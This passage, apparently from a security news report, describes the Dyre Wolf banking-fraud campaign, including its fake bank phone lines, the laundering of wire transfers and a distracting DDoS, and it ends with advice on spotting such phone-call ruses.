One of the many interesting things with this campaign is that the attackers are bold enough to use the same phone number for each website and know when victims will call and which bank to answer as. This all results in successfully duping their victims into providing their organizations’ banking credentials.
As soon as the victim hangs up the phone, the wire transfer is complete. The money starts its journey and bounces from foreign bank to foreign bank to circumvent detection by the bank and law enforcement. One organization targeted with the campaign also experienced a DDoS. IBM assumes this was to distract it from finding the wire transfer until it was too late.
The success of the Dyre Wolf campaign underscores the need for improved training so employees can better spot malicious e-mails and suspicious ruses like the one involving the phone call to the targets' banks. A practical check: treat any banking login page that asks you to phone a number as suspect, and call the bank only on a number you already hold, such as the one printed on a statement or card, never one displayed on the page.